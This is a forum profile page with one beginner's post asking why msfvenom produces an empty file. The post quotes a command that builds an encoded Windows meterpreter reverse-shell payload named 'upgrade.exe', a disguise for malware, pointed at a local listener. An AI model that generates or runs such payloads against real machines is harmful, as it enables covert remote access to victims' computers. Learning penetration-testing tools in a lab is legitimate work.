Jump to content

srootz

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

208 profile views

srootz's Achievements

Newbie

Newbie (1/14)

  1. Hey guys, so I just started using metasploit, but i have the following problem: everytime I use msfvenom to generate a .exe file the following happens: I type something like: msfvenom -p windows/meterpreter/reversetcp -e x86/shikataganai -i 5 LHOST=<local IP> LPORT=1337 -f exe > upgrade.exe the output is the following: msf > msfvenom -p windows/meterpreter/reversetcp -e x86/shikata_ga_nai -i 5 LHOST=10.0.0.10 LPORT=1337 -f exe > upgrade.exe * exec: msfvenom -p windows/meterpreter/reversetcp -e x86/shikata_ga_nai -i 5 LHOST=10.0.0.10 LPORT=1337 -f exe > upgrade.exe The upgrade.exe file is empty. Database is connected. and I have no idea what to do. .. Hopefully you can help me! Greetings, S.
×
×
  • Create New...